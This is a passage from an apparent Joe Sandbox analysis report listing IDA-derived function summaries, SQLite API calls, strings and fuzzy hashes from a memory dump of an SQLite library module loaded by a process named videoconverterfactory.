                                                                                                        • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                      • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                                        • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                        • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                                      • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                                      • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                                      • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1866449048-0
                                                                                                      • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                      • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                                      • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                      • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                                      • API String ID: 0-780898
                                                                                                      • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                      • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                                      • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                      • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                                      • API String ID: 0-2604012851
                                                                                                      • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                      • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                                      • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                      • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                                      • String ID: 0$SQLite format 3
                                                                                                      • API String ID: 3174206576-3388949527
                                                                                                      • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                      • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                                      • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                      • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                                      • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                                        • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                                        • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                                      • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                                      • String ID: |
                                                                                                      • API String ID: 1576672187-2343686810
                                                                                                      • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                      • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                                      • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                      • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                                      APIs
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                                        • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                                      • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                                      • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                                      • API String ID: 652164897-1572359634
                                                                                                      • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                      • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                                      • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                      • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                                      • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                                      • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 2352520524-0
                                                                                                      • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                      • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                                      • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                      • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                                      APIs
                                                                                                        • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                        • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                        • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                                        • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                      • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                                        • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                        • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                        • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                                      • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                                      • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                      • String ID: optimize
                                                                                                      • API String ID: 3659050757-3797040228
                                                                                                      • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                      • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                                      • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                      • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                                      APIs
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                                      • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                                      • sqlite3_free.SQLITE3 ref: 60965714
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 2722129401-0
                                                                                                      • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                      • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                                      • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                      • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                                        • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                                      • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                                        • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                                      • sqlite3_free.SQLITE3 ref: 60964783
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                                      • String ID:
                                                                                                      • API String ID: 571598680-0
                                                                                                      • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                      • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                                      • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                      • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                                      APIs
                                                                                                      • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                        • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                                      • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                                      • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                                      • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                      • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                      • sqlite3_free.SQLITE3 ref: 60963621
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 4276469440-0
                                                                                                      • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                      • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                                      • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                      • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                                      APIs
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                                      Strings
                                                                                                      • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                                      • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                                      • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                      • API String ID: 4080917175-264706735
                                                                                                      • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                      • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                                      • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                      • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                                      • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                                      • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: library routine called out of sequence$out of memory
                                                                                                      • API String ID: 2019783549-3029887290
                                                                                                      • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                      • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                                      • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                      • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                                      APIs
                                                                                                      • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                                                        • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                                        • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                                      • sqlite3_free.SQLITE3 ref: 609406F7
                                                                                                      • sqlite3_free.SQLITE3 ref: 60940705
                                                                                                      • sqlite3_free.SQLITE3 ref: 60940713
                                                                                                      • sqlite3_free.SQLITE3 ref: 6094071E
                                                                                                      • sqlite3_free.SQLITE3 ref: 60940729
                                                                                                      • sqlite3_free.SQLITE3 ref: 6094073C
                                                                                                      Memory Dump Source
